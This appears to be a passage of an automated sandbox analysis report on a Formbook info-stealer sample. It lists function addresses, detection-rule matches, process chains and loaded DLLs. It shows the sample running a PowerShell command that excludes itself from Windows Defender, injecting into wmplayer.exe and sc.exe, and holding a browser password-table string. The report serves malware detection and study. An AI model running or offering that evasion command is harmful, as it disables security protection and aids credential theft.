            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362F0CC13_2_0362F0CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035A475013_2_035A4750
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358077013_2_03580770
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357C7C013_2_0357C7C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F7B013_2_0363F7B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036316CC13_2_036316CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359C6E013_2_0359C6E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363757113_2_03637571
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358053513_2_03580535
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361D5B013_2_0361D5B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364059113_2_03640591
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363244613_2_03632446
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357146013_2_03571460
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F43F13_2_0363F43F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362E4F613_2_0362E4F6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FB7613_2_0363FB76
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363AB4013_2_0363AB40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035BDBF913_2_035BDBF9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F5BF013_2_035F5BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03636BD713_2_03636BD7
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359FB8013_2_0359FB80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03637A4613_2_03637A46
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FA4913_2_0363FA49
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F3A6C13_2_035F3A6C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362DAC613_2_0362DAC6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361DAAC13_2_0361DAAC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357EA8013_2_0357EA80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C5AA013_2_035C5AA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358995013_2_03589950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359B95013_2_0359B950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359696213_2_03596962
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364A9A613_2_0364A9A6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035829A013_2_035829A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358284013_2_03582840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358A84013_2_0358A840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035ED80013_2_035ED800
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035AE8F013_2_035AE8F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035838E013_2_035838E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035668B813_2_035668B8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F4F4013_2_035F4F40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FF0913_2_0363FF09
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035A0F3013_2_035A0F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C2F2813_2_035C2F28
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03572FC813_2_03572FC8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358CFE013_2_0358CFE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03581F9213_2_03581F92
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FFB113_2_0363FFB1
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03580E5913_2_03580E59
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363EE2613_2_0363EE26
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363EEDB13_2_0363EEDB
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03592E9013_2_03592E90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03589EB013_2_03589EB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363CE9313_2_0363CE93
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03637D7313_2_03637D73
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03583D4013_2_03583D40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03631D5A13_2_03631D5A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358AD0013_2_0358AD00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359FDC013_2_0359FDC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357ADE013_2_0357ADE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03598DBF13_2_03598DBF
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03580C0013_2_03580C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F9C3213_2_035F9C32
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FCF213_2_0363FCF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03570CF213_2_03570CF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03620CB513_2_03620CB5
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1178013_2_02E11780
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E2A2E013_2_02E2A2E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E132CB13_2_02E132CB
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E132D013_2_02E132D0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0CB9013_2_02E0CB90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0C96713_2_02E0C967
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0C97013_2_02E0C970
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0AC0813_2_02E0AC08
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0AC1013_2_02E0AC10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBB6313_2_033BBB63
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBA4813_2_033BBA48
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BAF6813_2_033BAF68
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBEFD13_2_033BBEFD
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBCCB13_2_033BBCCB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0335F290 appears 105 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 032CB970 appears 268 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03327E54 appears 89 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03315130 appears 36 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0334EA12 appears 86 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035C7E54 appears 96 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035FF290 appears 105 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035B5130 appears 36 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 0356B970 appears 268 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: No import functions for PE file found
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000000.2091070027.000001DF09F0D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0BBB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEzemesefejoF vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeBinary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
            Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
            Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ,
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@21/32@12/10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\Microsoft_WMP_70_CheckForOtherInstanceMutex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1512
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejalo0vz.3ve.ps1Jump to behavior
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2506456914.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2504141459.0000000002F9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
            Source: unknownProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
